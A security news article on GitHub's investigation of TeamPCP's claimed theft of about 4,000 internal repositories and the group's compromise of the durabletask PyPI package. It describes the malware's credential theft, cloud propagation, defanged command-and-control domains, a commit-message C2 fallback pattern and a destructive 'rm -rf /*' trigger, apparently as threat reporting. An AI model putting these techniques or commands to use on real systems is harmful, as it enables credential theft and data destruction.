GitHub Investigating TeamPCP Claimed Breach of ~4,000 Internal Repositories

GitHub Investigating TeamPCP Claimed Breach of ~4,000 Internal Repositories Ravie LakshmananMay 20, 2026Malware / Cloud Security GitHub on Tuesday said it's investigating unauthorized access to its internal repositories after the notorious threat actor known as TeamPCP listed the platform's source code and internal organizations for sale on a cybercrime forum. "While we currently have no evidence of impact to customer information stored outside of GitHub's internal repositories (such as our customers' enterprises, organizations, and repositories), we are closely monitoring our infrastructure for follow-on activity," the Microsoft-owned subsidiary said. The company also noted that it will notify customers via established incident response and notification channels if any impact is discovered. The development comes after TeamPCP, a threat actor behind a string of software supply chain attacks targeting open-source packages, listed GitHub's source code for sale for an asking price of no less than $50,000. The alleged data dump is said to include about 4,000 repositories. "As always, this is not a ransom," the group said in a post, according to screenshots shared by Dark Web Informer. "We do not care about extorting GitHub, 1 buyer and we shred the data on our end, it looks like our retirement is soon so if no buyer is found, we leak it for free." In a follow-up update shared on X, GitHub said it detected and contained a compromise of an employee device involving a poisoned Microsoft Visual Studio Code extension. As a risk mitigation measure, the company has rotated critical secrets, while prioritizing highest-impact credentials. "Our current assessment is that the activity involved exfiltration of GitHub-internal repositories only," GitHub said. "The attacker's current claims of ~3,800 repositories are directionally consistent with our investigation so far." GitHub did not disclose the name of the VS code extension, although it's worth noting that Nx Console recently suffered a compromise that allowed threat actors to push a multi-stage credential stealer and a supply chain poisoning tool. The Nx team has since acknowledged that "very few users were compromised." Following the incident, an X account linked to TeamPCP, xploitrsturtle2, stated: "GitHub knew for hours, they delayed telling you and they won't be honest in the future. What an amazing run, it's been an honor to play around with the cats over the past few months." TeamPCP Compromises durabletask PyPI Package News of the sale comes as TeamPCP's self-replicating malware campaign, known as Mini Shai-Hulud, continues to expand in reach with the compromise of durabletask, an official Microsoft Python client for the Durable Task workflow execution framework. Three malicious package versions have been identified: 1.4.1, 1.4.2, and 1.4.3. "The attacker compromised a GitHub account via a previous attack, dumped GitHub secrets from a repository to which the user had access, and from there had access to the PyPi token to publish directly," Google-owned Wiz said. The payload embedded into the package is a dropper, which is configured to fetch and run a second-stage payload ("rope.pyz") from an external server ("check.git-service[.]com"). The malware is assessed to be an evolution of the payload deployed in connection with the compromise of the guardrails-ai package last week. Specifically, it's designed to activate a full-featured infostealer that's capable of harvesting credentials associated with major cloud providers, password managers, and developer tools, and exfiltrating the data to the attacker-controlled domain. It's worth noting that the stealer is configured to execute only on Linux systems. According to SafeDep, the 28KB Python stealer also attempts to read HashiCorp Vault KV secrets, unlock and dump 1Password and Bitwarden password vaults, and access SSH keys, Docker credentials, VPN configurations, and shell history. "If the machine is running inside AWS, it propagates itself to other EC2 instances using SSM. If it's inside Kubernetes, it propagates through kubectl exec," Aikido Security said. "And if it detects Israeli or Iranian system settings, there's a 1-in-6 chance it plays audio and then runs rm -rf /*." "After enumerating SSM-managed instances, it uses SendCommand with the AWS-RunShellScript document to execute the rope.pyz payload on up to 5 other EC2 instances per profile," per StepSecurity. "The propagation script downloads the payload from the primary C2, falling back to the secondary domain t.m-kosche[.]com, and runs it in the background." Also notable is the use of the FIRESCALE mechanism to identify a backup command-and-control (C2) address in the event the primary domain is unreachable. It does this by searching GitHub's public commit messages for the pattern "FIRESCALE <base64_url>.<base64_signatue>" and extracting the C2 information from it. Details of this technique were previously highlighted by Hunt.io. Because the worm propagates using tokens stolen from infected environments, the number of affected packages is expected to grow. Any machine or pipeline that installed an affected version of the package should be treated as fully compromised. "The package is downloaded roughly 417,000 times a month, and the malicious code runs automatically the moment the package is imported, with no error messages and no visible signs of compromise," Endor Labs researcher Peyton Kennedy said. Found this article interesting? Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post. SHARE     Tweet Share Share SHARE  AWS, Cloud security, cybersecurity, GitHub, Kubernetes, Malware, Microsoft, PyPI, Software Supply Chain ⚡ Top Stories This Week New Exim BDAT Vulnerability Exposes GnuTLS Builds to Potential Code Execution Windows Zero-Days Expose BitLocker Bypasses And CTFMON Privilege Escalation On-Prem Microsoft Exchange Server CVE-2026-42897 Exploited via Crafted Email Microsoft Patches 138 Vulnerabilities, Including DNS and Netlogon RCE Flaws Ollama Out-of-Bounds Read Vulnerability Allows Remote Process Memory Leak Hackers Used AI to Develop First Known Zero-Day 2FA Bypass for Mass Exploitation 18-Year-Old NGINX Rewrite Module Flaw Enables Unauthenticated RCE ⚡ Weekly Recap: Linux Rootkit, macOS Crypto Stealer, WebSocket Skimmers and More [Webinar] How Modern Attack Paths Cross Code, Pipelines, and Cloud cPanel CVE-2026-41940 Under Active Exploitation to Deploy Filemanager Backdoor Microsoft's MDASH AI System Finds 16 Windows Flaws Fixed in Patch Tuesday Four OpenClaw Flaws Enable Data Theft, Privilege Escalation, and Persistence Cisco Catalyst SD-WAN Controller Auth Bypass Actively Exploited to Gain Admin Access Mini Shai-Hulud Worm Compromises TanStack, Mistral AI, Guardrails AI and More Packages ThreatsDay Bulletin: PAN-OS RCE, Mythos cURL Bug, AI Tokenizer Attacks, and 10+ Stories New Fragnesia Linux Kernel LPE Grants Root Access via Page Cache Corruption Load More ▼ ⭐ Featured Resources [Guide] Stop Email Fraud Before It Turns Into Ransomware Damage [eBook] Get the 3-Number SOC Diagnostic to Reduce Queue Risk [Webinar] Learn How to Handle Critical SOC Alerts With AI Support Identify Internal Attack Surfaces More Efficiently With a Free Assessment